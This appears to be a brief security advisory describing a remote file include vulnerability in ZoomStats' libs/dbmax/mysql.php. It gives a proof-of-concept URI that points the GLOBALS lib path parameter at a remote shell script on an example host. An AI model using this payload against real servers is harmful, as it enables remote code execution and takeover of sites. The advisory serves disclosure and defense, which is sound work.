ZoomStats MySQL.PHP Remote File Include Vulnerability

ZoomStats MySQL.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.example.com/shell.php?